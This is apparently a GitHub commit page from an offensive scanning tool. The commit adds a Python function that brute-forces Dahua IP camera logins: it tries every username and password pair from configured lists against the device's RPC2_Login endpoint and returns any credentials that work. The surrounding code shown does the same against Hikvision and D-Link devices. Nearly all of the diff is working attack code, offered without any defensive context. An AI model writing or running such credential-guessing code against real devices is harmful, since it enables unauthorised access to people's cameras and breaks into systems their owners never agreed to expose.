Update weak_passwd.py

ReturnHere · Nov 4, 2022 · 92c1f30 · 92c1f30
1 parent ec03fab
commit 92c1f30
Showing 1 changed file with 41 additions and 1 deletion.
diff --git a/Ingram/VDB/weak_passwd.py b/Ingram/VDB/weak_passwd.py
@@ -7,6 +7,8 @@
 
 USERS = config.USERS
 PASSWDS = config.PASSWDS
+USERS1 = config.USERS1
+PASSWDS1 = config.PASSWDS1
 TIMEOUT = config.TIMEOUT
 USERAGENT = config.USERAGENT
 
@@ -26,6 +28,44 @@ def hikvision_weak(ip: str) -> list:
     return [False, ]
 
 
+def dahua_disabled(ip: str) -> list:
+    url = f"http://{ip}/RPC2_Login"
+    headers = {
+        'User-Agent': USERAGENT,
+        'Host': ip,
+        'Origin': 'http://' + ip,
+        'Referer': 'http://' + ip,
+        'Accept': 'application/json, text/javascript, */*; q=0.01',
+        'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
+        'Accept-Encoding': 'gzip, deflate',
+        'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
+        'Connection': 'close',
+        'X-Requested-With': 'XMLHttpRequest',
+    }
+    for user in USERS1:
+        for passwd in PASSWDS1:
+            _json = {
+                "method": "global.login",
+                "params": {
+                    "userName": user,
+                    "password": passwd,
+                    "clientType": "Web3.0",
+                    "loginType": "Direct",
+                    "authorityType": "Default",
+                    "passwordType": "Plain",
+                },
+                "id": 1,
+                "session": 0,
+            }
+            try:
+                r = requests.post(url, headers=headers, json=_json, verify=False, timeout=TIMEOUT)
+                if r.status_code == 200 and r.json()['result'] == True:
+                    return [True, str(user), str(passwd), 'disabled-p455v0rT']
+            except Exception as e:
+                logger.error(e)
+    return [False, ]
+
+
 def dahua_weak(ip: str) -> list:
     url = f"http://{ip}/RPC2_Login"
     headers = {
@@ -94,4 +134,4 @@ def dlink_weak(ip: str) -> list:
             r = requests.get(f"http://{ip}", verify=False, headers=headers, timeout=TIMEOUT, auth=(user, p))
             if r.status_code == 200 and 'D-Link' in r.text:
                 return [True, str(user), str(p), 'weak pass']
-    return [False, ]
+    return [False, ]